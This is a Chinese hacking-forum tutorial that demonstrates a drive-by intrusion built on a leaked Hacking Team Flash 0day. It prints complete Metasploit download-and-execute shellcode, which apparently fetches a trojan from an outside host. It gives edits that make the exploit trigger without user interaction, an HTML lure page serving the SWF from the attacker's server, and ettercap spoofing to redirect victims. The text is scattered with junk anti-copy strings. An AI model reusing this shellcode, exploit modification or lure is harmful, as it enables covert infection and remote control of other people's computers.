中国网络渗透测试联盟

标题: flash 0day之手工代码修改制作下载者实例入侵演示 [打印本页]
作者: admin    时间: 2018-10-20 20:28
标题: flash 0day之手工代码修改制作下载者实例入侵演示

! R% H. l: ~* ]9 ~* x, Z 三、flash 0day之手工代码修改制作下载者实例入侵演示 ) G; t$ N% U$ |* D: c5 G$ e

/ m8 w j7 u# n% R$ M# L6 w$ _- R' ~: X& r% V

$ ?6 H2 O" U5 [# A 利用到的工具: ) k; B, a2 Z; t& ~2 l j7 H

w* s4 W _ F# K

/ T/ m' v6 X& o* Y' h) K. }) Y Msf : r" x3 P6 m9 q# g) x$ q

! G, |4 r% t2 J3 G1 r

+ G& J% e4 o3 O) B Ettercap - B& v. J( |8 G9 P3 F# ^' V% w

6 x7 j7 T: B: A& \0 Q7 A) H

9 ^. T9 w% F& c1 {9 E; ]6 x Adobe Flash CS6 ! p# X( _$ O0 u) t8 v" e5 @

. o9 o# b' A* j6 f9 C

5 p$ _0 ]% q: M! Z Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 6 L" y4 @% Z. Y8 N* I

/ U" o: @) Z! U3 T

' r. G1 _# F6 e m S 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options 8 W" V4 F4 X- f5 e% Z

& @: c I2 ^8 j7 Q% l" y

3 ~, t, L( X& C. o 如图: " v6 A, Z* D6 d8 C; g

5 t$ r) I, Y: w9 I. y5 ~6 n: v

! y% m8 n2 }! F1 o$ g( x \4 t   / w2 J% O/ ^8 m ^/ T

6 X0 C; v: e3 W' i

. O+ f4 N+ Y. e# E( l6 `   0 ?! z5 ]* G6 E' d. j

8 |% `$ x# R# n: ?% c; w

4 Q6 S2 M: }4 M- ^2 u# A4 U2 A# E 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ! P# O) y7 M1 N5 d" f

* R [0 U& b% u5 G/ p' X( [

) P9 Z. ?0 r6 ?0 m' I   , I8 A4 q# X% B, z0 i

; r% V8 X# C7 G3 z/ l- D0 c+ M

) W& [4 {/ f* A1 F   # i _( `5 m/ T2 w* x5 r

- @: E. S( b2 c: C8 n: q9 c8 C

0 Z" Y5 c) I2 b9 ^( r 然后执行generate -t dword生成shellcode,如下: , s5 A. M0 Z5 [* v

- t, L/ o, U4 m) d" k

L9 E+ |( u) d: L! k% F   : j W8 r5 \ y" Z9 V$ g7 x5 o

6 S8 Y; K% P$ x" v1 j; N/ Z4 J6 ?

! p1 Z: v: q) u. { 复制代码到文本下便于我们一会编辑flash exp,如下: / @* O" F2 v& q* Z% {# \

2 m+ ?: ^8 ^6 s5 V

! Y8 t$ J8 A$ |" J1 o/ I7 q 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, & z8 D$ e' J; S' o

3 Z+ r+ `6 R0 t$ P' W8 v3 e9 v

7 K7 }3 f( Y% H# F1 x 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 7 W1 C3 Q/ c8 i* j* S( P) t; {

( I5 c7 C0 A6 c, u! P4 n

/ y7 `6 m4 B- E 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 1 y8 z2 n7 w( m; j1 p- w5 k

, l; m2 y, y2 J% r. Y& [( K3 e

% M4 a# B. v. }' a+ P; d; J 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 1 \$ N4 F6 U; H& O" B$ j _

D# Z7 E: E! P0 i3 v; B# q$ w

& ?5 G8 Y! f6 c1 G7 r; v1 w 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, % c2 _ G. [) T

' r3 j' j: _) ~6 ~/ k) i0 L: Z! b- D

; _9 h G2 X7 ~* K3 D0 g 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 3 J/ {5 a+ U' R6 k$ b P

- }: S4 H" B9 R# ?

3 J7 Y! t. t) F, ]2 o 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, $ o1 a A& { Q e, B" B u# J3 m

! @1 p2 @6 U- q1 D( @6 ]

1 {9 n+ s5 c( q. e) M8 N 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, $ |" E- `8 t* u: V- i& r

3 x* W) i3 R8 H5 u

2 a8 P6 O# \* F6 N 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, + U; U. U9 R! s1 D# X) D# _

/ `0 R' z6 M& \

9 s$ b8 p9 E7 H: L/ q 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 1 U( m9 K' o, n0 r! c9 h7 x

5 M, @2 ~3 [4 \$ V

3 X; o: u- \# e/ w 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 5 A6 E- ?' Y) f- T4 Y7 D

, |" P* y* E: d# H1 d2 L) }- E

# z z2 l7 o, \ a/ s5 h) C4 W" P 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 4 N! [, Z' h9 N

) z/ s1 E$ B5 e$ k5 V# j4 V

% z9 D) q3 v( D% \; S, e 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 3 f4 Y1 t" P1 V; S

g) [0 G8 B% J) S2 s: J! ~: n

0 ^, d9 N% {9 |& s7 `! s 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 8 n: w% y3 i/ K( }8 P: y- I, p

b0 q2 I& k* C. L

) C, Z5 ^3 {6 q   % r4 j% e1 q* Z4 \

: @6 J: ^* m; R' Z4 ^( V3 W6 Q

& G$ w4 d7 e/ \% P9 J7 e$ a   6 W: H' S5 O& L+ S0 X2 e& M4 ^

) L: | S; W' W! f2 x; d

+ d6 e+ B- R) k 下面我们来修改flash 0day exp,需要修改三个文件,分别为: - q. n1 s, R1 U- j: k& N

! v# i! a7 C/ F8 c' q

2 c* A; q% R+ E% M/ X) b2 l   # z" }% Y" z2 ]

@0 K2 ?# O1 D4 O

% _) C4 b. j* O" B4 _% U o) | 先修改ShellWin32.as,部分源代码如图: 4 i( B5 y# |& _0 e

) Z j: D* W+ ^2 A/ m

# G1 Z" H: }4 y, V9 t% ^4 ^( G   + E* }7 B9 |- Z' p) q

! M; m- c9 j; B$ x O# `

$ v4 C3 s+ m# r& E) t 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ( s8 h' F. L: c. q& A# K* [, |: F2 U

! A+ p% H; Q6 Y) ^( e/ f% O1 x

0 n$ x* t5 S3 b+ E( a   8 `* I' O. N3 ~- Q

2 |8 T o* s2 P1 r7 r4 b

( u5 ^# s' B% n. l: J, B/ ] 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: - C% |( V/ F2 {! R! D7 l

2 Z5 }, B7 Z4 }+ d# L

: S& T" t( }/ v# r   ) d$ c3 d6 o o! @' ~

7 [4 ?' a* g' g0 d8 s2 F

/ q: S9 C1 C; F" X+ Q" b 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 7 i! X+ R$ s% G! ?

; c7 d6 y4 R: }! \

1 {5 _1 v i) n$ V1 b   ; |- R' r; P6 `, C6 M; P

* T% ^8 n& `8 D+ D5 Y% t

* G5 O+ m2 @7 b8 j3 ?$ q( `" Y9 v. I   8 l/ y& I$ Y! g, v

- G* {/ Y3 X3 R$ ?" ^# }

! V" X5 F/ y1 Z8 p0 A, B- s+ }   5 i1 }. F. D" h R

. C3 h0 W% x) z+ c0 @3 f

8 B, w* ]6 ^ c' Y7 V2 J0 P 然后点保存,下面我们来编译一下,打开 # V/ _" Z: v/ D, Y6 V. E. d1 L$ `! L: x

* {3 Z @8 q8 e. v3 J7 \) T

/ R9 [ z' V$ F3 d+ v0 X* q- b6 H exp1.fla然后点文件-发布,看看编译没错误 2 Q' ^1 O+ N p3 J$ q8 j+ ]% D

8 C3 f5 R" b8 w, N/ L7 f

- r: n4 P0 N7 s( u8 _# L; I   1 N7 F. W i& w0 ^/ p9 v u; |

* U; u* k6 U; f9 r5 ~

- o5 {- l) t" m   3 I d0 H) \ Z* J S$ |

0 Y* k( n; N& b7 g9 ?2 W

! p* k* E0 v9 K8 O. ?   & v$ S! q2 U/ Y" z

/ a' @/ E6 o$ N8 F5 z. j5 N

# C# o+ n2 `3 ]' i: E1 l   0 ~ P, r" G# d# U3 I

, v7 a1 m8 I+ @, p

' n7 N: O v' A3 h 然后我们把生成的 2 p2 p) q" ]5 k9 K/ z0 i" h

& |$ e! I6 M2 h' Y

8 C; M9 T7 t+ T4 L3 \. } exp1.swf丢到kailinux /var/www/html下: / {+ f( b9 P+ l) J

* Y1 h7 j# y& ^( n0 O& Q* o9 x

2 |1 L1 S, j9 h' B' ]0 L 然后把这段代码好好编辑一下 ( W; G6 ~7 D4 ~

+ R+ z' |3 V, s9 f' h; C

4 b+ u! v6 A" |' \8 I1 k! `   2 ]4 I2 j1 _5 v2 l, Q+ e9 S

# }# O. r( L5 I4 J. f" f

: Z% J4 x5 {( n; K* P8 \* \" a. g. ?0 Y   ) Q3 J0 c ?2 f( X, C( l5 r

6 B5 Y8 F$ d" z J/ V

I/ u. B# k- T4 C9 |   % d$ \2 A7 m# Y) f2 p9 i

9 S. @! d( e k4 i

4 L A0 J8 H; O5 g8 z4 i; m   2 p, c' j& `$ w( z* Q

) x# Q1 l# f- l! ?; e* w3 X

# f2 w" W# w' }5 C) @& o   ?& u I& D' _' \8 b1 U

. z. N6 [& M1 b- [6 Z" q$ V9 \

' M0 w, A: e7 P6 v/ d- n   " N, Q( L! j. X3 }. O9 S5 H. H8 K

3 @3 i4 Q1 f4 c& D

$ \& O* Z" [5 w2 _# v: n. Z <!DOCTYPE html> - s! T4 {6 q7 l' {

4 Z: B" Z% m* s) l

! ^* m; A0 G/ x1 _; X <html> / H+ } S1 C9 l% s9 ?3 d* p7 m% G

) N8 o: _9 O# t$ W

+ R# L1 G) q4 E. E5 B <head> # g* { P; l' n7 p/ H& I

: c) h, P+ _5 E" H7 s9 {- N+ D

( n- d7 A# }9 d' |) m& h <meta http-equiv="Content-Type" content="text/html; " V4 v) n5 d! p* U& j! X

: q; f+ ~6 }1 \2 z) n# v* e

9 I# J' r& J" x: D7 k- B& W charset=utf-8"/> + Y2 \& _. |- Q7 q+ m

8 m( R6 }4 c* H. \- `. s

7 J; t$ I5 h* Q; \- T, i </head> " K& s+ Z" W- v

$ d; y/ X# J9 E2 ?$ k( o/ N

- C! s5 q$ ~# S8 g <body> # p0 z- ~, j9 T3 P$ h2 G3 k

, D Y0 a, }9 J K' O

3 f6 V# C5 e( B <h2> Please wait, the requested page is loading...</h2> ~) H: |+ p. K: ?: P

8 z5 a6 v* S2 q/ f5 t: A; \9 i

0 t( Y: {$ n: E6 M: I/ P6 J5 s0 O <br> , ~1 Y/ T" {2 y+ Y

2 O- T7 o' V! U1 a

# v5 q* |6 `9 f: Q% A <OBJECT 7 [* Y! T3 ?9 u0 N

+ q# i% f6 s+ L) F+ h; [

# z! w7 t5 W7 h/ B. b8 Y2 w) _5 G classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie ; X( F; T, v+ K0 ~( Z

' [8 ], L$ Z" j: i& t; C p2 U

5 s, ?5 Z0 A3 T0 M9 |3 I VALUE="http://192.168.0.109/exp1.swf"></OBJECT> & I! n* H5 c) n" D& I/ x

' ]: D! L* O( v; C# _9 ]1 J. t

1 t& c+ t* S( n0 h, i# _( \ Z </body> 4 h8 L/ h A5 U" p+ ~5 M' u0 y

: I# \# c3 [6 ~1 h' Q. P; V

' p3 {, R% l2 z <script> 2 m: w2 M% k& J$ q

# p* x# `( ~+ W' I& p

2 f2 k% |" }: |- u- U5 N     setTimeout(function () { : C5 ?' G$ s" p3 o# S

1 O4 H4 c. m0 j

; P* I& t( B) J% N5 E: j          7 N" H; ^: a6 q; {1 E6 S

+ G3 e( e. B& h7 ?

3 |4 j6 y8 b- z window.location.reload(); 3 Y& V+ P3 w/ p( t2 Z2 _" ^

w' [( P% }6 u! }1 u. m L: k: |

! T9 o: C8 [( P V- B3 h6 c     }, 10000); / u& p! O# m6 A1 I% l( ~ C

7 R' \6 o$ q, v: o, X& g

8 h0 |# r( L* I5 Z6 B3 ]7 c, `6 }   4 R, x; k) Q d

; ^+ p% J: r" c) N

; R; F/ U; ~& r0 Q: O+ ~0 ^6 V </script> 4 S- K0 A) u d/ b3 W. v/ w

, N. L/ g) }3 b" M0 x9 Q9 t- F

. |2 G% v; j& a. B4 e+ n </html> $ w/ l( j- C* b# h: A; _

" c8 V( W. u+ \7 ], N6 c0 u0 p8 H( s

- X( Y6 A- H R7 E0 \1 P. [: J1 H7 `   1 J( u( \$ y8 D; `1 P& b

7 U. S6 h) r, ?% A

) ?( B& Z4 I5 L" C! x( _ 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: * M; W% D1 T$ N. E) S; ~

* C% z& o! u: l) f

! [! v2 b5 P i) R" n# ~; L   + f& Q5 B" N* A* n6 u* s2 F

/ e; ~% b; m2 `0 O7 `

7 D" n. r5 o$ [   ; o, [, y) B# `. Y/ Y

( ]8 K. x; R: {* r/ n+ I! Y

" i. _& A5 K0 W. g2 f   8 d# X' @9 @; k) W; b" P9 p

" }2 J k; f) g l* J' y

* Z2 w' J0 d E7 y   : ^0 C) a; _% }3 e J2 o

# |4 u( Q( z0 I) F3 k

$ B8 Y) ]- H4 m* }5 L' v& k   6 u. Z, G1 W: v3 |2 Y, V+ O/ o

# C. x* v( a1 ^! ]

% Z! _' F0 P" Y# G; U9 n0 b: { 下面我们用ettercap欺骗如图: ' \ `9 L1 r0 j9 O0 i

. }) p- @, K# P/ j$ I

7 J+ P3 i* H) a. y8 M   x3 T+ ?+ c9 f

3 i$ h W/ w1 @: i8 }$ P7 y; x/ r

* h7 v) E& T/ `% ~4 o6 u! G! P- x   8 o4 @) ]; u: q( P

0 A/ Z# J- z0 o& M& I

: j' U+ {# N2 H1 R 下面我们随便访问个网站看看: 1 |$ U ~1 @/ Q4 R5 x

/ m6 X; M8 i! D! H: w

! M2 P* x9 g7 T' T 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: & }4 w& v6 F# M( O q% N: W

' Z v# p O0 _4 W

) v6 Z" K( P' S& }- V   - F. |4 g p$ i0 R

* ^" [: L" A6 N; d' y3 w! b* D: c, L

0 o' O& S/ A) t; Q" C( x1 Z" @ 我们看另一台, - v6 D; j* I1 `+ u1 N# }

8 L1 u# d# Q4 O2 v/ E

# S7 u O* p, d' o* k& h: Q 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 : F* c( P2 T2 R6 K3 P





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2